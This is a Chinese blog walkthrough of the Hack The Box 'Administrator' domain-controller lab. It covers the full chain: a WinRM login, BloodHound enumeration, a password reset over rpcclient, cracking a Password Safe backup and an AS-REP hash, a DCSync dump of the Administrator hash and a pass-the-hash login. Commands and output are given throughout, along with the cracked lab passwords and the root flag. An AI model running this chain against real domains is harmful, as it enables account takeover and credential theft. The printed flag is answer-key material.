米拉可爱捏
开个新坑————HTB靶场实况系列
主要偏向纪实为主，大佬求轻喷
这是一个windows的域控靶机,让我们看看有啥子漏洞

信息收集

经典nmap丝滑小连招起手

nmap --unprivileged -oA ./result/ -Pn -p- -sV -vv  <IP># 扫描端口+对应服务
nmap --unprivileged --script=vuln -p<open_port1>,<open_port2>,<open_port3> <IP>#自带的漏洞扫描脚本，上!

结果

Initiating NSE at 22:50
Completed NSE at 22:50, 2.76s elapsed
Nmap scan report for 10.10.11.42
Host is up, received user-set (0.37s latency).
Scanned at 2024-12-25 22:49:29 中国标准时间 for 74s
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON  VERSION
21/tcp   open  ftp           syn-ack Microsoft ftpd
53/tcp   open  domain        syn-ack Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-12-25 21:35:22Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack
464/tcp  open  kpasswd5?     syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack
5985/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: D:\Program Files (x86)\Nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.64 seconds
PS C:\Users\20232\Desktop>

然后发现是域控主机开启了winrm服务，题目信息还给了个初始账户，那绝对是要让我们打域控了

Olivia初始账户

getshell

发现存在winrm（5985）服务，通过上evil-winrm工具来实现访问

┌──(kali㉿DESKTOP-7DDB89Q)-[/mnt/c/Users/20232/Desktop]
└─$ evil-winrm -i 10.10.11.42 -u 'Olivia' -p 'ichliebedich'

╔╗Evil-WinRM shell v3.7╔╗

╔╗Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine╔╗

╔╗Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion╔╗

╔╗Info: Establishing connection to remote endpoint╔╗
*Evil-WinRM* PS C:\Users\olivia\Documents>

这样就拿到了全交互的PS会话了

域内信息收集+分析

这就不得不提到BloodHound分析工具了，这个虽然不能有任何自带的exp但是能够帮助我们分析各个用户之间的关联，并且指明一条通往神圣的Administrator的道路。
我这里使用的是.Net的工具来实现的SharpHound.exe，具体开源地址:https://github.com/BloodHoundAD/SharpHound
你也可以远程加载POwerhsell脚本到内存里面再执行，不过我这里就只是

*Evil-WinRM* PS C:\Users\olivia\Documents> upload SharpHound.exe

╔╗Info: Uploading /mnt/c/Users/20232/Desktop/SharpHound.exe to C:\Users\olivia\Documents\SharpHound.exe╔╗

╔╗Data: 2076672 bytes of 2076672 bytes copied╔╗

╔╗Info: Upload successful!╔╗
*Evil-WinRM* PS C:\Users\olivia\Documents> .\SharpHound.exe -c all --ZipFileName output.zip
*Evil-WinRM* PS C:\Users\olivia\Documents> ls

    Directory: C:\Users\olivia\Documents

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        12/25/2024   1:52 PM          25242 20241225135232_BloodHound.zip
-a----        12/25/2024   1:54 PM          25417 20241225135403_output.zip
-a----        12/25/2024   1:54 PM           1428 NDI3ZmMyMGItNzc4Ny00MzE1LTllNDItYTM4YTEzYjcyZDFj.bin
-a----        12/24/2024   3:02 PM         770273 PowerView.ps1
-a----        12/25/2024   1:50 PM        1557504 SharpHound.exe

*Evil-WinRM* PS C:\Users\olivia\Documents> download 20241225135403_output.zip

╔╗Info: Downloading C:\Users\olivia\Documents\20241225135403_output.zip to 20241225135403_output.zip╔╗
Progress: 100% : |▓▓▓▓▓▓▓▓▓▒|

直接把这个导入BloodHound界面就行了。什么？听说你还没有BloodHound界面？你为啥不直接apt装一个呢？

Michael跳板账户一

msrpc的利用(重置密码)

┌──(root㉿kali)-[/HTB/Administrator]
└─# rpcclient -U michael 10.10.11.42
Password for [WORKGROUP\michael]:
rpcclient $> setuserinfo2 benjamin 23 'benjamin'
rpcclient $> exit

msrpc利用小插曲

其实msrpc再实战中不只能够来修改密码，还可以用来进一步收集信息:
例如:

# 连接到目标系统
rpcclient -U admin%password 192.168.1.100

# 枚举所有用户
enumdomusers

# 查询特定用户的详细信息
queryuser 1001

# 枚举所有组
enumdomgroups

# 查询特定组的详细信息
querygroup 512

# 列出所有共享资源
netshareenum

# 查询域信息
querydominfo

# 获取系统信息
srvinfo

还不止这个端口还支持调用远程修改注册表和查询wql,甚至可以单开一篇文章来探讨了。受限于篇幅不继续展开了

benjamin跳板账户二

试了一圈发现只有ftp服务能够登上去

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ftp benjamin@10.10.11.42 
Connected to 10.10.11.42.
220 Microsoft FTP Service
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||54544|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||54546|)
125 Data connection already open; Transfer starting.
100% |**************************************************|   952        1.63 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (1.15 KiB/s)
ftp> exit
221 Goodbye.

这个搜了一圈资料，发现是密码备份文件,这个项目有:Releases · pwsafe/pwsafe
但是直接解密发现需要密码，咋办呢？我们就上了hashcat结合rockyou.txt爆破:

┌──(kali㉿DESKTOP-7DDB89Q)-[~]
└─$ hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt
tekieromucho

直接拿到三个密码，但是其中只有emily的能用,于是我们就可以通过emily的用户WINRM进去了。

alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur

emily 用户(user权限)

尝试:msf内核漏洞一把梭哈

我这里直接

msfconsole
use post/multi/recon/local_exploit_suggester
setg session 1
run

结果发现每一个能打得通的。结果只能够通过打域控的方式来实现提权了，配合BloodHound分析

踩了一些关于工具配置的坑，最终还是通过打出哈希来了

┌──(kali㉿kali)-[~/Desktop/targetedKerberoast]
└─$ GetNPUsers.py administrator.htb/emily -dc-ip 10.10.11.42 -outputfile ethan.txt -format hashcat
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
Name   MemberOf  PasswordLastSet             LastLogon  UAC      
-----  --------  --------------------------  ---------  --------
ethan            2024-10-12 16:52:14.117811  <never>    0x410200 

/home/kali/.local/bin/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$ethan@ADMINISTRATOR.HTB:21c554bcc53d51c7d401bbbf59451a0d$4181310479f2f2682eda51b0810e8db26ac8cc0e667f80ba46a2b3a684dd95dbcc93d4b0666009481e19720cf513fa5bdb57cc53aadec3e04ac3427a38d75f7fec484739357cb120ca39c36b140b59192a693770670e19d297a22dc5425c845f4fde7f5994fadef7fadef0457c15172b3dbe7361e85fdd1970b1778bbf1593d69e3ff24c6c61df965d5737f837d05fce8271671cce222e7cf33591bed3882cae3c20b8ceb63858e1c83f759e43e0cdbce1e4ec75940c145a0bfe5c6b2af8da1ee002cebe9e5b1b485d1f3565acc26ff644381c4f09a2e4c8bf12f29b2a9c4ee0cfcc4ebf193a29b745a89a1a6fb43ac5e48b9fb5a198

┌──(kali㉿kali)-[~/Desktop/targetedKerberoast]
└─$ 

然后上hashcat

┌──(kali㉿DESKTOP-7DDB89Q)-[/mnt/c/Users/20232/Desktop]
└─$ hashcat -m 18200 ethan.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i7-12700K, 14945/29954 MB (4096 MB allocatable), 20MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Initializing backend runtime for device #1. Please be patient...
Host memory required for this attack: 5 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5asrep$23$ethan@ADMINISTRATOR.HTB:21c554bcc53d51c7d401bbbf59451a0d$4181310479f2f2682eda51b0810e8db26ac8cc0e667f80ba46a2b3a684dd95dbcc93d4b0666009481e19720cf513fa5bdb57cc53aadec3e04ac3427a38d75f7fec484739357cb120ca39c36b140b59192a693770670e19d297a22dc5425c845f4fde7f5994fadef7fadef0457c15172b3dbe7361e85fdd1970b1778bbf1593d69e3ff24c6c61df965d5737f837d05fce8271671cce222e7cf33591bed3882cae3c20b8ceb63858e1c83f759e43e0cdbce1e4ec75940c145a0bfe5c6b2af8da1ee002cebe9e5b1b485d1f3565acc26ff644381c4f09a2e4c8bf12f29b2a9c4ee0cfcc4ebf193a29b745a89a1a6fb43ac5e48b9fb5a198:limpbizkit

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$ethan@ADMINISTRATOR.HTB:21c554bcc53d5...b5a198
Time.Started.....: Fri Dec 27 16:38:28 2024 (0 secs)
Time.Estimated...: Fri Dec 27 16:38:28 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4546.3 kH/s (1.84ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 20480/14344385 (0.14%)
Rejected.........: 0/20480 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> michelle4

Started: Fri Dec 27 16:38:19 2024
Stopped: Fri Dec 27 16:38:29 2024

┌──(kali㉿DESKTOP-7DDB89Q)-[/mnt/c/Users/20232/Desktop]
└─$ 

ethan域管理员

根据BloodHound

┌──(kali㉿kali)-[~/Desktop/targetedKerberoast]
└─$ secretsdump.py administrator.htb/ethan:limpbizkit@10.10.11.42 -dc-ip 10.10.11.42 -just-dc-user administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
[*] Cleaning up... 

┌──(kali㉿kali)-[~/Desktop/targetedKerberoast]
└─$ 

然后直接pth攻击打进去 ：

┌──(kali㉿DESKTOP-7DDB89Q)-[/mnt/c/Users/20232/Desktop]
└─$ evil-winrm -i 10.10.11.42 -u 'administrator' -H 3dc553ce4b9fd20bd016e098d2d2fd2e                                                          

╔╗Evil-WinRM shell v3.7╔╗

╔╗Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine╔╗

╔╗Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion╔╗

╔╗Info: Establishing connection to remote endpoint╔╗
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd  Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls

    Directory: C:\Users\Administrator\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        12/26/2024  11:24 AM             34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop>cat root*
f13bc2dc883aff0db7279e6d70aaf6ec
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

拿下